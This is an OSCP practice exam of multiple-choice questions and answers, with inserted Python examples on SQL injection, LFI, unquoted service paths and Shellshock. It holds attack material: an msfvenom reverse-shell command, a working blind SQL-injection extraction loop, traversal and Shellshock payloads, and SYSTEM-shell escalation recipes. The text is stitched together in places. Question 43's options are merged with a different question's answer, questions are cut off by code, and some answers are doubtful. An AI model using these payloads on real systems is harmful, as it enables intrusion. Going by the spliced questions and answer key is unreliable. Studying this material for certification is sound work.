PrepIQ Offensive Security Certified OSCP Ultimate Exam, Exams of Technology

Prepare for OSCP certification topics including penetration testing methodologies, enumeration, exploitation, privilege escalation, pivoting, and reporting practices.

Typology: Exams

2025/2026

Available from 06/03/2026

shilpi-jain-3
PrepIQ Offensive Security Certified OSCP Ultimate Exam
**Question 1.** Which Nmap NSE script is most appropriate for enumerating SMB
shares on a target?
A) http-enum
B) smb-enum-shares
C) ssl-cert
D) dns-brute
**Answer:** B
**Explanation:** The `smb-enum-shares` NSE script specifically queries SMB
services to list available shares, making it ideal for SMB enumeration.
**Question 2.** When performing passive DNS enumeration, which technique can
reveal subdomains without contacting the target server?
A) Zone transfer request
B) DNS brute-forcing
C) Querying public certificate transparency logs
D) Sending a SYN scan to port 53
**Answer:** C
**Explanation:** Certificate Transparency logs contain domain names and
subdomains that have been issued certificates, allowing passive discovery without
direct interaction with the target.
**Question 3.** Which of these tools is prohibited on the OSCP exam because it
automates web application exploitation?
A) Gobuster
B) sqlmap
C) Nmap
D) Netcat
**Answer:** B
**Explanation:** The OSCP exam restrictions prohibit automated exploitation tools
such as sqlmap; SQL injection has to be found and exploited by hand. This is an
exam rule, not a lab rule: sqlmap may be used freely in the practice labs, which is
why it is still worth knowing its options. Gobuster, Nmap and Netcat are
enumeration and connectivity tools and are permitted.

**Question 4.** Which HTTP status code typically indicates that a directory listing is enabled on a web server?
A) 200 OK
B) 403 Forbidden
C) 404 Not Found
D) 401 Unauthorized
**Answer:** A
**Explanation:** A request for a directory that has no index file returns 200 OK with an auto-generated HTML page listing its contents (Apache titles it "Index of /path"). The status code alone is not proof, since a 200 with an ordinary index page is normal, so confirm that the body is a listing; a 403 for the same directory usually means listing is disabled.

**Question 5.** Which of the following is a reliable indicator of a reflected XSS vulnerability?
A) Input is stored in a database and later displayed.
B) The payload appears unchanged in the URL after submission.
C) The server returns a 500 Internal Server Error.
D) The application uses prepared statements.
**Answer:** B
**Explanation:** Reflected XSS echoes input taken from the request, usually a query-string parameter, straight back into the response. The payload surviving in the URL is only the starting point; the finding is confirmed when the same payload appears in the response body without HTML encoding, in a context where the browser will execute it. Option A describes stored XSS, a 500 error says nothing about XSS, and prepared statements (D) are a SQL injection defence.

**Question 6.** Which option for msfvenom creates a Windows Meterpreter reverse TCP payload with an .exe format?
A) -p windows/meterpreter/reverse_tcp -f exe -o shell.exe
B) -p linux/x86/meterpreter_reverse_tcp -f elf -o shell.elf
C) -p java/meterpreter/reverse_tcp -f jar -o shell.jar
D) -p php/meterpreter_reverse_tcp -f raw -o shell.php
**Answer:** A
**Explanation:** windows/meterpreter/reverse_tcp with -f exe produces a PE executable carrying a staged Meterpreter reverse shell. In practice the command also needs LHOST and LPORT, and a multi/handler configured with the same payload must be listening before the executable runs. The other options target Linux (ELF), Java (JAR) and PHP.

**Question 10.** Which PowerShell cmdlet can be used to enumerate local user accounts on a Windows machine?
A) Get-ADUser
B) net user
C) Get-LocalUser
D) whoami /all
**Answer:** C
**Explanation:** Get-LocalUser, from the Microsoft.PowerShell.LocalAccounts module that ships with Windows PowerShell 5.1, lists local accounts (including whether they are enabled) without any AD tooling. net user (B) gives similar output but is a classic command, not a cmdlet; Get-ADUser needs the RSAT AD module and a domain; whoami /all describes only the current token.

**Question 11.** When exploiting a vulnerable LFI, which technique allows you to read /etc/passwd on a Linux web server?
A) ../../../../etc/passwd
B) ?file=../../../../etc/passwd%00
C) ?page=login.php
D) ?id=1 UNION SELECT
**Answer:** B
**Explanation:** A URL-encoded null byte (%00) truncates the path when the application appends a suffix such as .php, because the C string handed to the filesystem ends at the NUL; the server then opens /etc/passwd instead of /etc/passwd.php. This works only on old interpreters (PHP before 5.3.4); current versions reject an embedded NUL, and there plain ../ traversal (option A) is the technique when no suffix is appended. UNION SELECT is SQL injection, not LFI.

**Question 12.** Which of the following is a typical sign of a successful Kerberoasting attack?
A) Obtaining a clear-text password for a domain admin.
B) Capturing a TGT ticket for a service account.
C) Extracting a service ticket (TGS) that can be cracked offline.
D) Receiving a golden ticket from the KRBTGT account.
**Answer:** C
**Explanation:** Kerberoasting requests TGS service tickets for accounts that have an SPN. Each ticket is encrypted with a key derived from the service account's password (for RC4-HMAC it is the NT hash itself), so the ticket can be cracked offline with hashcat (mode 13100) or John without touching the domain controller again. No TGT is captured and KRBTGT is not involved; a golden ticket requires the KRBTGT hash, which is a later, post-compromise step.
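An added example, not from the original exam material, that makes the null-byte truncation in Question 11 concrete and shows why the same mechanism drives the upload bypass in Question 39 and how the traversal check in Question 59 is verified. It emulates the C-string behaviour in Python alongside a hardened resolver; PAGES_DIR, the page layout and the passwd sample are constructed assumptions.

```python
import posixpath
import re

PAGES_DIR = "/var/www/html/pages"   # assumed document layout for the example
ROOT_LINE = re.compile(r"^root:[^:]*:0:0:", re.M)


def c_string(s):
    """What a C API sees: the string ends at the first NUL byte."""
    return s.split("\x00", 1)[0]


def include_legacy(page):
    """include($_GET['page'] . '.php') on an old interpreter (PHP < 5.3.4):
    the concatenated string reaches the C library, so %00 drops the suffix."""
    return posixpath.normpath(c_string(PAGES_DIR + "/" + page + ".php"))


def include_current(page):
    """Same code on a current interpreter: an embedded NUL is rejected, but
    nothing stops ../ from walking out of PAGES_DIR (the suffix stays appended)."""
    if "\x00" in page:
        raise ValueError("file name contains a null byte")
    return posixpath.normpath(PAGES_DIR + "/" + page + ".php")


def include_safe(page):
    """Hardened: reject NUL, resolve the path, require the result to stay under
    PAGES_DIR. Real code should use os.path.realpath so symlinks are followed
    before the containment check, and ideally an allow-list of page names."""
    if "\x00" in page:
        raise ValueError("file name contains a null byte")
    # posixpath.join discards PAGES_DIR when page is absolute, so that case
    # also fails the containment check below.
    resolved = posixpath.normpath(posixpath.join(PAGES_DIR, page + ".php"))
    if not resolved.startswith(PAGES_DIR + "/"):
        raise ValueError("path escapes the pages directory: " + resolved)
    return resolved


def upload_name_legacy(filename):
    """Naive upload filter: extension check on the submitted name, file written
    through a C string API. shell.php%00.jpg passes the check and lands as shell.php."""
    if not filename.lower().endswith((".jpg", ".png")):
        raise ValueError("extension not allowed")
    return c_string(filename)


def confirms_traversal(body):
    """Question 59 style verification: does the response body look like /etc/passwd?"""
    return bool(ROOT_LINE.search(body))


# Constructed response body standing in for a leaked /etc/passwd.
SAMPLE_PASSWD = "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
```

include_legacy("../../../../etc/passwd\x00") resolves to /etc/passwd while the same input without the NUL resolves to /etc/passwd.php, which is the whole difference between options A and B; include_safe refuses both.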

**Question 13.** In the context of OSCP, which command is used to perform a TCP SYN scan on the top 1000 ports?
A) nmap -sT -p- target.com
B) nmap -sS target.com
C) nmap -sU target.com
D) nmap -sA target.com
**Answer:** B
**Explanation:** -sS sends SYN probes and never completes the handshake, which needs raw-socket privileges (run it as root). Without -p, Nmap scans its default list of the 1000 most common TCP ports, so -sS target.com is exactly the scan described. -sT (A) is a full connect scan and -p- widens it to all 65535 ports; -sU is a UDP scan; -sA is an ACK scan used to map firewall rules rather than to find open ports.

**Question 14.** Which of the following is the most reliable method to bypass a basic authentication dialog using Burp Suite?
A) Intercept and modify the Authorization header with a base64-encoded username:password.
B) Change the request method from GET to POST.
C) Disable SSL verification.
D) Use the Repeater to change the URL path.
**Answer:** A
**Explanation:** HTTP Basic authentication is nothing more than an Authorization: Basic base64(username:password) header. Setting or replaying that header in Burp satisfies the check without the browser dialog ever appearing, which is what the question means by bypassing it. Valid or guessed credentials are still required; the encoding is trivially reversible, so credentials sent over plain HTTP are effectively clear text. Changing the method, disabling SSL verification or editing the path does nothing to the authentication check.

**Question 15.** Which Linux kernel vulnerability is commonly exploited for local privilege escalation on kernels older than 4.4.0?
A) Dirty COW (CVE-2016-5195)
B) Heartbleed (CVE-2014-0160)
C) Shellshock (CVE-2014-6271)
D) Spectre (CVE-2017-5753)
**Answer:** A
**Explanation:** Dirty COW (CVE-2016-5195) is a race condition in the kernel's copy-on-write handling of private memory mappings that lets an unprivileged user write to read-only files, including root-owned ones such as /etc/passwd or a SUID binary, and so gain root. It affected kernels from 2.6.22 until the fix in 4.8.3 (backported to the stable series, for example 4.4.26), so an unpatched 4.4.0 is vulnerable. Check uname -r against the distribution's patched package rather than trusting the upstream version number alone. Heartbleed and Shellshock are remote bugs in OpenSSL and Bash, and Spectre is a CPU side channel, not a root escalation primitive.

**Question 19.** Which of the following is a sign that a web application is vulnerable to SQL injection?
A) The page returns a 403 Forbidden error.
B) The URL contains a parameter that, when appended with ' OR '1'='1, returns additional rows.
C) The server logs show a 404 error.
D) The application uses HTTPS.
**Answer:** B
**Explanation:** Appending ' OR '1'='1 closes the string literal and adds a condition that is always true, so the WHERE clause matches every row. Extra or different rows coming back (or a database error from the unbalanced quote) show that the input reaches the query unparameterised. Pair it with an always-false variant such as ' AND '1'='2 to rule out coincidence. 403, 404 and HTTPS say nothing about how the query is built.

**Question 20.** Which Metasploit auxiliary module can be used to perform a SMB null session enumeration?
A) auxiliary/scanner/smb/smb_version
B) auxiliary/scanner/smb/smb_enumusers
C) auxiliary/scanner/smb/smb_null_session
D) auxiliary/scanner/ssh/ssh_login
**Answer:** C
**Explanation:** A null session is an SMB connection with an empty username and password. In Metasploit the SMB scanner modules (smb_enumshares, smb_enumusers, smb_lookupsid) perform that enumeration when run with blank SMBUser and SMBPass; confirm the exact module name available in your Metasploit version with search smb, since module names change between releases. smb_version (A) only fingerprints the OS and SMB dialect, and ssh_login (D) is unrelated.

**Question 21.** What is the primary purpose of the searchsploit command in OSCP labs?
A) To scan open ports.
B) To locate public exploits matching a keyword.
C) To generate payloads.
D) To enumerate Active Directory objects.
**Answer:** B
**Explanation:** searchsploit searches a local copy of the Exploit-DB archive (the exploitdb package on Kali) by keyword or CVE, so it works offline; searchsploit -m copies an exploit into the working directory and searchsploit -u refreshes the archive. It neither scans nor generates payloads.
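As an added example (not part of the original exam text), the following Python uses an in-memory SQLite database to show both the tautology test of Question 19 and the boolean-based blind extraction that Question 41 further down describes. The table contents and the "does the page show any rows" oracle are constructed for the demonstration; the vulnerable and parameterised lookups sit side by side.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the target's database (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2"), ("admin", "Winter2024!")])
    return conn


def lookup_vulnerable(conn, username):
    """The injectable pattern: user input concatenated into the SQL text."""
    sql = "SELECT id, username FROM users WHERE username = '%s'" % username
    return conn.execute(sql).fetchall()


def lookup_safe(conn, username):
    """Same query with a bound parameter: input can never change the query structure."""
    return conn.execute("SELECT id, username FROM users WHERE username = ?", (username,)).fetchall()


def page_shows_rows(conn, username):
    """The application's observable behaviour, reduced to a boolean oracle:
    did the page render any result rows. Errors are swallowed, as on a
    production site, so only true/false survives (the blind condition of Q41)."""
    try:
        return len(lookup_vulnerable(conn, username)) > 0
    except sqlite3.Error:
        return False


CHARSET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*_-."


def blind_extract(oracle, column, table, where, max_len=32):
    """Boolean-based blind extraction of one value, one character at a time.
    Each probe closes the string literal, ORs in a substring comparison and
    comments out the application's trailing quote with '-- '."""
    value = ""
    for pos in range(1, max_len + 1):
        matched = None
        for ch in CHARSET:
            probe = "x' OR (SELECT substr(%s,%d,1) FROM %s WHERE %s)='%s' -- " % (
                column, pos, table, where, ch)
            if oracle(probe):
                matched = ch
                break
        if matched is None:      # substr() past the end returns '', so nothing matches
            break
        value += matched
    return value


if __name__ == "__main__":
    db = make_db()
    print("tautology rows:", lookup_vulnerable(db, "' OR '1'='1"))
    print("parameterised :", lookup_safe(db, "' OR '1'='1"))
    print("blind extract :", blind_extract(lambda p: page_shows_rows(db, p),
                                           "password", "users", "username='admin'"))
```

The blind loop issues up to len(CHARSET) requests per character; real tooling halves that with a binary search on unicode(substr(...)) and, where no boolean difference is visible, falls back to time-based probes such as SLEEP(), pg_sleep() or WAITFOR DELAY.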

**Question 22.** Which flag in gcc is used to compile a 32-bit binary on a 64-bit system?
A) -m
B) -m32
C) -march=i
D) -static
**Answer:** B
**Explanation:** -m32 tells GCC to emit 32-bit (i386) code, which you need when the target's vulnerable binary or the exploit source is 32-bit. The host also needs the 32-bit headers and libraries (the gcc-multilib package on Debian and Kali). -static removes the dependency on the target's libc version and is often combined with -m32 when compiling kernel exploits for an old target, but by itself it does not change the word size.

**Question 23.** In a Windows environment, which registry key controls the AlwaysInstallElevated policy?
A) HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System
B) HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
C) HKCU\Software\Microsoft\Windows\CurrentVersion\Run
D) HKLM\System\CurrentControlSet\Services\LanmanServer
**Answer:** B
**Explanation:** AlwaysInstallElevated lives under HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer and the per-user HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer. Both values must be 1 for the policy to take effect; then any MSI the user runs installs as SYSTEM, so an msfvenom package (-f msi) launched with msiexec /quiet /i gives a SYSTEM shell. Option A is where UAC settings such as EnableLUA live, C is a per-user autorun key and D is the SMB server service.

**Question 24.** Which Nmap script can be used to brute-force SNMP community strings?
A) snmp-brute
B) snmp-info
C) snmp-sysdescr
D) snmp-get-next
**Answer:** A
**Explanation:** snmp-brute tries a wordlist of community strings (its default list includes public and private) against UDP 161, so run it with -sU -p 161. Once a string works, snmp-info and snmp-sysdescr, or snmpwalk outside Nmap, pull the MIB contents (users, processes, interfaces, installed software).

**Question 28.** In the context of OSCP, which of the following is a valid reason to use a "reverse shell" rather than a "bind shell"?
A) Reverse shells are easier to detect.
B) Reverse shells work better when the target is behind a firewall that blocks inbound connections.
C) Bind shells require elevated privileges.
D) Reverse shells do not need a listener on the attacker's machine.
**Answer:** B
**Explanation:** A bind shell listens on the target and needs an inbound connection, which perimeter and host firewalls commonly block. A reverse shell connects outbound from the target to a listener on the attacker machine (for example nc -lvnp 4444), and outbound traffic is far more often allowed. Reverse shells still need that listener, so D is wrong, and neither shell type inherently requires elevated privileges.

**Question 29.** Which PowerShell command can be used to retrieve the list of services that run with the "Local System" account?
A) Get-Service | Where-Object {$_.StartType -eq "Automatic"}
B) Get-WmiObject Win32_Service | Where-Object {$_.StartName -eq "LocalSystem"}
C) net start
D) sc queryex type= service
**Answer:** B
**Explanation:** The Win32_Service WMI class exposes StartName, and "LocalSystem" is its value for services running as NT AUTHORITY\SYSTEM. Get-WmiObject is deprecated in PowerShell 7, where Get-CimInstance Win32_Service gives the same objects. Get-Service and net start show state, not the account; sc queryex lists services without the account, which sc qc <name> shows one service at a time.

**Question 30.** Which of the following is a common indicator that a Linux binary is compiled with Position Independent Executable (PIE) enabled?
A) The binary has the setuid bit set.
B) readelf -h shows "Type: DYN".
C) The file size is exactly 4096 bytes.
D) It contains the string "/bin/sh".
**Answer:** B
**Explanation:** readelf -h reports Type: DYN (shared object) for a PIE and Type: EXEC for a fixed-address executable, because a PIE is linked like a shared library so that the loader can place it at a random base; only then does ASLR apply to the main image, which matters when an exploit needs fixed addresses for gadgets or functions. Shared libraries are DYN too, so a PT_INTERP program header (or checksec) distinguishes a PIE executable. Many current distributions build PIE by default. The SUID bit, file size and strings say nothing about PIE.
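An added example (not the page's or any tool's code) that performs the two readelf checks from Question 30 and, further down, Question 47 by parsing the ELF structures directly: e_type for PIE and the string tables for __stack_chk_fail. build_test_elf produces constructed ELF images for the demonstration; pass a real path on the command line to inspect an actual binary.

```python
import struct
import sys

ET_EXEC, ET_DYN = 2, 3          # e_type values from the ELF specification
SHT_STRTAB = 3                  # section type: string table (.dynstr, .strtab)
EHDR_FMT = "<16sHHIQQQIHHHHHH"  # little-endian ELF64 header, 64 bytes
SHDR_FMT = "<IIQQQQIIQQ"        # ELF64 section header, 64 bytes


def elf_hardening(data):
    """Return {'pie': bool, 'canary': bool} for a little-endian ELF64 image.

    PIE: e_type is ET_DYN (what readelf -h prints as 'Type: DYN'). Shared
    libraries are DYN as well, so on a real host also confirm the file is the
    program you intend to run (it has a PT_INTERP segment).
    Canary: some string table contains '__stack_chk_fail', meaning at least one
    function was built with -fstack-protector* and calls the failure handler.
    Scanning .dynstr keeps this working on stripped, dynamically linked binaries.
    """
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if data[4] != 2 or data[5] != 1:
        raise ValueError("only little-endian ELF64 is handled by this example")
    fields = struct.unpack_from(EHDR_FMT, data, 0)
    e_type, e_shoff, e_shentsize, e_shnum = fields[1], fields[6], fields[11], fields[12]
    canary = False
    for i in range(e_shnum):
        sh = struct.unpack_from(SHDR_FMT, data, e_shoff + i * e_shentsize)
        sh_type, sh_offset, sh_size = sh[1], sh[4], sh[5]
        if sh_type != SHT_STRTAB:
            continue
        # Entries are NUL-terminated. The leading NUL stops a match on a suffix
        # like 'x__stack_chk_fail'; the trailing one rejects '__stack_chk_fail_local'.
        table = b"\x00" + data[sh_offset:sh_offset + sh_size]
        if b"\x00__stack_chk_fail\x00" in table:
            canary = True
    return {"pie": e_type == ET_DYN, "canary": canary}


def build_test_elf(e_type, symbol_names):
    """Constructed input for the example: a minimal ELF64 image with a null
    section header plus one SHT_STRTAB section. It is not a loadable program."""
    strtab = b"\x00" + b"".join(name + b"\x00" for name in symbol_names)
    shoff = 64 + len(strtab)
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + bytes(8)     # ELF64, LE, version 1
    ehdr = struct.pack(EHDR_FMT, ident, e_type, 62, 1, 0, 0, shoff, 0,
                       64, 0, 0, 64, 2, 1)                   # e_machine 62 = x86-64
    null_shdr = bytes(64)
    strtab_shdr = struct.pack(SHDR_FMT, 1, SHT_STRTAB, 0, 0, 64, len(strtab), 0, 0, 1, 0)
    return ehdr + strtab + null_shdr + strtab_shdr


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            print(sys.argv[1], elf_hardening(fh.read()))
    else:
        for e_type, names in ((ET_DYN, [b"__stack_chk_fail", b"puts"]), (ET_EXEC, [b"puts"])):
            print("e_type", e_type, elf_hardening(build_test_elf(e_type, names)))
```

Run it as python3 elfcheck.py /path/to/binary to get the same two answers that readelf -h and readelf -s | grep __stack_chk_fail give; the missing third check, NX, lives in the PT_GNU_STACK program header flags rather than in the section table.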

**Question 31.** Which technique can be used to extract password hashes from the SAM file on a Windows system without administrative privileges?
A) Use reg save to dump the SAM hive.
B) Access the file directly via \\C$\\Windows\\System32\\config\\SAM.
C) Use pwdump after obtaining SYSTEM.
D) It is not possible without elevation.
**Answer:** D
**Explanation:** The SAM hive, and the SYSTEM hive that holds the boot key needed to decrypt it, are locked while Windows runs and readable only by SYSTEM and Administrators, so reg save, direct file access over C$ and pwdump-style tools all need elevation first. Misconfigured ACLs on backups or on volume shadow copies (the HiveNightmare bug, CVE-2021-36934) are exceptions worth checking, not the rule.

**Question 32.** Which of the following is the primary purpose of the BloodHound tool in AD environments?
A) Password cracking.
B) Visualizing relationships and attack paths in Active Directory.
C) Performing brute-force attacks against Kerberos.
D) Enumerating open ports.
**Answer:** B
**Explanation:** BloodHound ingests data collected by SharpHound (or bloodhound-python from Linux) into a graph database and visualises group memberships, ACLs, sessions and delegation, so that the shortest path from a compromised user to Domain Admins can be queried rather than guessed. It collects and cracks nothing itself.

**Question 33.** Which flag in sqlmap forces the tool to use a POST request instead of GET?
A) --method=POST
B) -p
C) --data
D) --batch
**Answer:** A
**Explanation:** --method=POST forces the HTTP method. Supplying a body with --data "param=value" already makes sqlmap send POST, so the two are normally used together, or replaced by -r with a request file saved from Burp. -p names the parameters to test and --batch accepts the default answers non-interactively.

**Question 37.** Which of the following is a typical first step when attempting to exploit a Windows service with an unquoted path?
A) Create a malicious executable named after the first directory in the path.
B) Modify the service registry entry to point to a new binary.
C) Restart the service manually.
D) Dump the service's memory.
**Answer:** A
**Explanation:** When a service ImagePath is unquoted and contains spaces, for example C:\Program Files\My App\svc.exe, Windows tries C:\Program.exe, then C:\Program Files\My.exe, and only then the real binary. If the current user can write to one of those directories, dropping an executable with the truncated name there and restarting the service (or waiting for a reboot) runs it under the service account, usually SYSTEM. Find candidates with wmic service get name,pathname,startmode and check directory ACLs with icacls. Editing the registry entry (B) already requires the privileges you are trying to gain.

**Question 38.** Which of the following Nmap scripts can be used to detect the presence of a Heartbleed vulnerability?
A) ssl-heartbleed
B) tls-nextprotoneg
C) http-vuln-cve2015-
D) ssh-hostkey
**Answer:** A
**Explanation:** ssl-heartbleed sends a malformed TLS heartbeat request and reports whether the server returns memory beyond the declared payload length (CVE-2014-0160, OpenSSL 1.0.1 through 1.0.1f). tls-nextprotoneg lists negotiated protocols and ssh-hostkey is unrelated.

**Question 39.** When exploiting a web application with a file upload feature, which of the following file types is most likely to bypass naive validation?
A) image.jpg with a PHP payload embedded after a null byte.
B) document.pdf containing a macro.
C) script.js with harmless code.
D) archive.zip containing a text file.
**Answer:** A
**Explanation:** Many upload filters check only the extension of the submitted name. With a name such as shell.php%00.jpg the check sees .jpg, but when the name is passed to a C string API the file is written as shell.php. As with null bytes in LFI, this depends on an old runtime (PHP before 5.3.4); on current stacks try alternative extensions (.phtml, .phar), double extensions, case variations and Content-Type mismatches instead, and confirm the upload directory actually executes scripts.

**Question 40.** Which Linux command can be used to list all scheduled cron jobs for the current user?
A) crontab -l
B) ls -l /etc/cron.*
C) systemctl list-timers
D) at -l
**Answer:** A
**Explanation:** crontab -l prints the invoking user's crontab. It does not show system-wide jobs, so for privilege escalation also read /etc/crontab, /etc/cron.d/* and the /etc/cron.* directories (root's jobs), and list systemd timers with systemctl list-timers --all; at -l covers only one-off at jobs.

**Question 41.** Which of the following is a characteristic of a "blind" SQL injection?
A) The application returns database errors directly.
B) The attacker does not see the query output, only boolean or time-based responses.
C) The injection occurs in a hidden form field.
D) It only works on NoSQL databases.
**Answer:** B
**Explanation:** In a blind injection neither query output nor error text is visible. Data is inferred one bit at a time from a boolean difference in the page (content, length, status code) or from a delay caused by SLEEP(), pg_sleep() or WAITFOR DELAY. It is slower than error-based or UNION injection but just as exploitable.

**Question 42.** Which of the following is the most effective way to identify a vulnerable version of sudo on a Linux host?
A) sudo -V
B) apt list --installed | grep sudo
C) sudo -l
D) dpkg -s sudo
**Answer:** D
**Explanation:** dpkg -s sudo (rpm -q sudo on Red Hat based systems) prints the installed package version including the distribution's patch revision, which is what security advisories reference. sudo -V prints the upstream version, but distributions backport fixes without bumping it, so compare against the package changelog. sudo -l shows what the user may run, which matters for the escalation itself rather than for version identification.

**Question 43.** Which of the following techniques can be used to achieve privilege escalation on a Windows system whose Print Spooler is vulnerable to PrintNightmare?
A) Exploit the vulnerable Print Spooler service to write a malicious DLL to the system directory.
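An added Python example, not part of the original exam, that reproduces the search order Windows uses for an unquoted ImagePath (the rule behind Question 37) and pairs each hijack point with the directory that would need to be writable. The service path and the list of writable directories are constructed inputs; on a target the writable set comes from icacls.

```python
import ntpath


def hijack_candidates(image_path):
    """Paths Windows tries, in order, for an unquoted service ImagePath.
    CreateProcess splits the command line at each space until it finds a
    file, appending .exe when the fragment has no extension:
      C:\\Program Files\\My App\\svc.exe  ->  C:\\Program.exe,
                                             C:\\Program Files\\My.exe,
                                             C:\\Program Files\\My App\\svc.exe
    The last element is the real binary; the ones before it are hijack points."""
    if image_path.startswith('"'):
        return []                      # quoted paths are parsed unambiguously
    parts = image_path.split(" ")
    candidates = []
    for i in range(1, len(parts) + 1):
        prefix = " ".join(parts[:i])
        if prefix.lower().endswith(".exe"):
            candidates.append(prefix)  # reached the real executable; the rest is arguments
            break
        candidates.append(prefix + ".exe")
    return candidates


def exploitable_paths(image_path, writable_dirs):
    """Keep the hijack points whose directory the current user can create files in.
    writable_dirs is constructed input here; on the target establish it with
    icacls <dir> and look for (W), (M) or (F) granted to your user or to groups
    such as Users or Authenticated Users."""
    writable = {d.rstrip("\\").lower() for d in writable_dirs}
    hits = []
    for cand in hijack_candidates(image_path)[:-1]:
        if ntpath.dirname(cand).rstrip("\\").lower() in writable:
            hits.append(cand)
    return hits


if __name__ == "__main__":
    svc = r"C:\Program Files\My App\svc.exe"
    print(hijack_candidates(svc))
    print(exploitable_paths(svc, [r"C:\Program Files"]))
```

A hit only becomes a shell when the service can be restarted (sc stop/start needs rights on the service; otherwise a reboot, if you have SeShutdownPrivilege) and when the dropped binary is either a service executable or exits after spawning the payload, since Windows kills a process that does not respond to the Service Control Manager.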

C) Get-ADUser -Properties msDS-AllowedToDelegateTo
D) whoami /all
**Answer:** B
**Explanation:** klist, built into Windows, displays the Kerberos tickets (the TGT and any service tickets) cached for the current logon session; klist purge clears them. whoami /all shows groups and privileges, not tickets, and the Get-ADUser query reads a delegation attribute from AD.

**Question 47.** Which of the following is the best way to identify if a Linux binary is compiled with stack canaries enabled?
A) readelf -s binary | grep __stack_chk_fail
B) strings binary | grep canary
C) file binary
D) ldd binary
**Answer:** A
**Explanation:** A binary built with -fstack-protector (or the -strong and -all variants) calls __stack_chk_fail when a function's canary has been overwritten, so that symbol shows up in the symbol table (readelf -s, nm -D or objdump -T). Its absence from a dynamically linked binary is a strong sign that no function has a canary; in a statically linked binary look in the regular symbol table. Note that plain -fstack-protector instruments only functions with character arrays, so some functions can still be unprotected. strings, file and ldd do not report it; checksec summarises the same check in one line.

**Question 48.** Which of the following is a common method to bypass a web application login form that uses basic authentication?
A) Use a valid JWT token.
B) Submit credentials in the Authorization header.
C) Inject JavaScript into the password field.
D) Change the request method to HEAD.
**Answer:** B
**Explanation:** Basic authentication is carried in Authorization: Basic base64(username:password); sending that header with valid credentials satisfies the check without the interactive prompt. It is not a bypass of the authentication itself: without valid credentials the options are guessing them (hydra's http-get module, or Burp Intruder against the header) or finding content the realm does not protect. Because base64 is reversible, credentials captured over plain HTTP are effectively clear text.

**Question 49.** When performing enumeration of a Linux system, which command can reveal SUID binaries that are owned by root?
A) find / -perm -4000 -type f 2>/dev/null
B) ls -l /usr/bin
C) cat /etc/passwd
D) chmod +s /tmp/file
**Answer:** A
**Explanation:** -perm -4000 selects files with the SUID bit (-perm -u=s is equivalent); add -user root to keep only root-owned ones, and 2>/dev/null hides permission-denied noise. Compare the list against the distribution's defaults and against GTFOBins for binaries with known escalations. ls -l /usr/bin covers one directory, /etc/passwd lists accounts, and chmod +s sets the bit rather than finding it.

**Question 50.** Which of the following is a typical sign that a target is vulnerable to the "Shellshock" Bash bug?
A) The server returns "500 Internal Server Error" when a crafted HTTP header containing () { :;}; is sent.
B) The server refuses all SSH connections.
C) The web page contains the string "".
D) The DNS server returns NXDOMAIN for all queries.
**Answer:** A
**Explanation:** Bash before the September 2014 patches (CVE-2014-6271 and its follow-ups) parsed exported function definitions out of environment variables and executed whatever followed them. CGI scripts expose request headers as environment variables (HTTP_USER_AGENT, HTTP_REFERER), so a header value beginning () { :;}; followed by a command runs on the server. A 500 only suggests the injected command broke the CGI output; a more reliable confirmation is () { :;}; echo; echo vulnerable and looking for the string in the body, or a command that calls back to your host.

**Question 51.** Which of the following Windows commands can be used to list all local administrator accounts?
A) net localgroup Administrators
B) whoami /groups
C) net user
D) gpresult /r
**Answer:** A
**Explanation:** net localgroup Administrators lists the members of the local Administrators group, including any domain groups nested in it. net user lists every local account regardless of privilege, whoami /groups shows only the current token's groups, and gpresult /r reports applied Group Policy.

**Question 52.** Which Nmap script can be used to enumerate SMB users on a target?
A) smb-enum-users
B) smb-os-discovery
C) smb-protocols
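An added example, not from the exam material, with constructed web server log lines: a parser that flags Shellshock attempts in request headers (the indicator from Question 50) and a helper that builds the headers for the more reliable echo-based check. The log format is Apache's combined format; the IPs, timestamps and requests are invented.

```python
import re

# Apache "combined" format; the three quoted fields are request, referer, user-agent.
# Caveat: Apache escapes an embedded double quote as \", which this pattern does not handle.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
# The trigger bash looked for: a variable value beginning with a function definition.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Constructed sample lines (not a real capture): two probes against a CGI script, two benign requests.
SAMPLE_LOG = """\
203.0.113.7 - -    [10/Mar/2026:10:01:02 +0000] "GET /cgi-bin/status.sh HTTP/1.1" 500 231 "-" "() { :;}; /bin/bash -c 'id'"
203.0.113.7 - - [10/Mar/2026:10:01:05 +0000] "GET /cgi-bin/status.sh HTTP/1.1" 200 512 "() { :;}; echo; echo vulnerable" "Mozilla/5.0"
198.51.100.4 - - [10/Mar/2026:10:02:11 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.9 - - [10/Mar/2026:10:03:40 +0000] "GET /cgi-bin/status.sh HTTP/1.1" 200 512 "-" "curl/8.5.0"
"""


def find_shellshock(log_text):
    """Return one record per request carrying a Shellshock pattern in any header field."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line.replace("    ", " "))   # tolerate extra spacing in hand-edited samples
        if not m:
            continue
        for field in ("ua", "ref", "req"):
            if SHELLSHOCK_RE.search(m.group(field)):
                req_parts = m.group("req").split(" ")
                hits.append({
                    "ip": m.group("ip"),
                    "field": field,
                    "status": int(m.group("status")),
                    "path": req_parts[1] if len(req_parts) > 1 else m.group("req"),
                })
                break
    return hits


def probe_headers(marker):
    """Headers for a manual check. 'echo;' terminates the CGI header block so the
    marker lands in the response body: seeing it echoed back proves execution,
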